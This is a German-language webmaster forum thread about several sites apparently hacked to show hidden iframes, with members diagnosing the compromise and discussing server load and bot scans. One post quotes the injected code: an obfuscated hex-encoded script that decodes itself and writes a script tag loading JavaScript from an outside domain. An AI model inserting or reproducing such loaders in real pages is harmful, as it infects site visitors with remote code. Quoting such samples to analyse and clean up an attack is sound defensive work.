Was ist neu?
Digital Marketing & Webmaster Forum

Digital Marketing, Internet-Technologien, Metaverse und mehr interessieren Dich? Registriere Dich gleich kostenlos, um Mitglied zu werden! Sobald Du angemeldet bist, kannst Du loslegen, Themen und Beiträge veröffentlichen und mit anderen Mitgliedern in Kontakt treten! Wir wünschen Dir einen anregenden Austausch!

SEITEN gehackt!

Pornostar

- Premium Member -
schulterzuck

...wir sind grade am suchen auf verschiedenen seiten wie sie es machen - es taucht ein kleiner iframe auf, der im quelltext nicht zu sehen ist - eventuell wurde auch der adserver von einem pp gehackt....

überprüft eure seiten wo ihr iframes von pp´s eingebunden habt
 

che

- Premium Member -
...wir sind grade am suchen auf verschiedenen seiten wie sie es machen - es taucht ein kleiner iframe auf, der im quelltext nicht zu sehen ist - eventuell wurde auch der adserver von einem pp gehackt....

überprüft eure seiten wo ihr iframes von pp´s eingebunden habt

Was macht der Iframe denn?
 

Pornostar

- Premium Member -
tja, wir sind am suchen - lässt man sich den quelltext anzeigen taucht das auf:

<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script><script type="text/javascript">


ist auf statischen seiten, blogs und tgps - es sind einzelne seiten betroffen - nicht der ganze server - auch schon htaccess gecheckt. im quelltext finden wir nichts
 

blackmexx

- Premium Member -
@Pornostar

Hab da mal eine Frage.

Hast du einen eigenen Server?
Wenn ja wann hast du das letzte Mal ein Systemupdate gemacht?

Wenn du einen eigenen Server hast, schon die Logs auf verdächtige Aktivitäten geprüft bzw. wie Zugriff auf den Server und die Seiten genommen wurde. Hier evtl. Scripte auf Updates und oder Sicherheitslücken checken.

Bei einem Hack ist das Geschrei meisten immer ganz groß ebenso der ärger. Aber grundlegen sind Hacks auf Sicherheitslücken zurückzuführen, die mit einfachen Updates behoben werden können.



Schon mit einem kleinen Befehl wie (last) lässt sich prüfen wer zuletzt via FTP oder SSH zugegriffen hat.



Gruß
 

sophie

- Premium Member -
benutzt Du openx als adserver?
So wie ich das sehe, hatte ich ein fast identisch gelagertes Problem.
 

Pyth0n

Neues Mitglied
Ist schon bekannt, wo die Lücke war, bzw. ob mehrere Systeme betroffen sind? Oder war es nur ein Sql Injection o.ä.?
 

blackmexx

- Premium Member -
Ist schon bekannt, wo die Lücke war, bzw. ob mehrere Systeme betroffen sind? Oder war es nur ein Sql Injection o.ä.?

In die richtig scheint es wohl zugehen. Bei mir wird seit heute früh um 5 versucht drauf zukommen. Kommt aus China zumindest die IP. Abgefragt werden sämtlich Script Variation von a-z überwiegend PHP-Script, womit ich auf mein Erstes Post zurückführen möchte. Es wäre angebracht ein Server update sowie Script Updates zu machen. Auf FTP und SSH ist momentan ruhe.
 

che

- Premium Member -
In die richtig scheint es wohl zugehen. Bei mir wird seit heute früh um 5 versucht drauf zukommen. Kommt aus China zumindest die IP. Abgefragt werden sämtlich Script Variation von a-z überwiegend PHP-Script, womit ich auf mein Erstes Post zurückführen möchte. Es wäre angebracht ein Server update sowie Script Updates zu machen. Auf FTP und SSH ist momentan ruhe.

Scans auf Standard-Script-Installation vornehmlich aus den Internet-Schurkenstaaten ist an der Tagesordnung.
Gerade auf Shop-Servern blocke ich alle diese Länder grundsätzlich.

Aus China oder Indonesien bestellt keiner in unseren Shops .. sollen se draussen bleiben mit ihren ganzen Bots, Scans und der ganze Dreck.
Im Moment wieder ganz beliebt phpmyadmin- und awstat-installationen und die suche nach einer vermeintlichen crossdomain.xml
 

blackmexx

- Premium Member -
Achso, du hast richtig fett über dem normalen Level damit zu tun?
Wo kommen die denn her?

221.224.13.25 IP Address WHOIS | DomainTools.com

Kommt alles von einer IP die "Standard Scans" sind immer verteilt über denn tag von verschiedenen IPs aber das hier geht im Sekunden Takt. Das load geht teilweise über 5-6 hinaus und da hört der Spaß auf das ist schon fast einer DDOS gleich. Wie schon gesagt seit heute früh um 5 ich meine irgendwann muss auch der dümmste Bot begreifen, dass es keine Lücke gibt, na mal schauen, wie lange das noch läuft. Noch läuft der Server recht stabil.
 

che

- Premium Member -
221.224.13.25 IP Address WHOIS | DomainTools.com

Kommt alles von einer IP die "Standard Scans" sind immer verteilt über denn tag von verschiedenen IPs aber das hier geht im Sekunden Takt. Das load geht teilweise über 5-6 hinaus und da hört der Spaß auf das ist schon fast einer DDOS gleich. Wie schon gesagt seit heute früh um 5 ich meine irgendwann muss auch der dümmste Bot begreifen, dass es keine Lücke gibt, na mal schauen, wie lange das noch läuft. Noch läuft der Server recht stabil.

Also ne load von 5-6 ist doch eigentlich echt harmlos, das ist ja gar nix.
Sperre china doch komplett aus, dann ist ruhe.
hast ja hoffentlich nen mod_geoip laufen
 

Globi

- Premium Member -
genau, das ist nur ein virtueller wert, den kann man sich einstellen wie man will.

abhaengig wieviele und wie starke prozessoren und wie die serversoftware das rechnet.
ausserdem ob der load nur mal kurzfristig ist, wenn zb ein video konvertiert wird, oder andauernd.

ist fast sowas wie pagerank :)

wenn du natuerlich normal ein load von 0,2 hast, dann ist 6 schon relativ hoch.

es giebt da programme wo du dein server einem stresstest unterziehen kannst.
Web Test Tools
da kannst diverse situationen testen lassen.

solche bots sollten allerdings nicht viel machen, die machen ja nicht mehr als die user selbst. ausser du hast ein datenbanklastige software, wo dann wirklich viele anfragen an die db verursacht werden.
 

Brainpurge

- Premium Member -
TradePulse ist davon auch betroffen.

Einfach die filter.php und die updater.php in den TradePulse-Ordner kopieren und updater.php ausführen, schon ist das Problem behoben.

Gruß Brainpurge
 

che

- Premium Member -
für so eine aussage musst du aber die hardware und software ganz genau kennen.

Nein, die Load ist ein relativer Wert lokalen Hardware. Es ist egal, ob du einen C64 da stehen hast oder ein K, das ist eigentlich Latte.
Denn der Wert sagt nicht wirklich was über die aktuelle Rechnerleistung aus, sondern wieviel mal der aktuelle Rechner da stehen müsste um ne Load von 1 zu haben. Und bei ner Load Average von 5-6 arbeitet jeder Server weiter, er hat ne Menge zu tun, aber er arbeitet, weil Prozesse eben priorisiert parallel oder je nach Task auch seriell ablaufen.
Von daher kann jede Maschine immer auch ein mehrfaches seiner eigentlichen Leistungskraft an Anforderung verkraften, weil nicht alle Rechenleistung in der gleichen Sekunde fällig wird.

Definitiv steht eine Maschine ab einer gewissen Load natürlich, aber nicht bei 5 oder 6.

Jeder von euch hat schon Load Averages von über 50 gesehen, das kommt vor.
Ist nicht gut, und man muss dringend nachsehen, was da los ist, aber in der Regel schiesst das eine Maschine noch nicht ab.

Je nach Ram fangen die Kisten an zu swappen, und dann wirds richtig, richtig LAHM ... aber .. still living.
 
Oben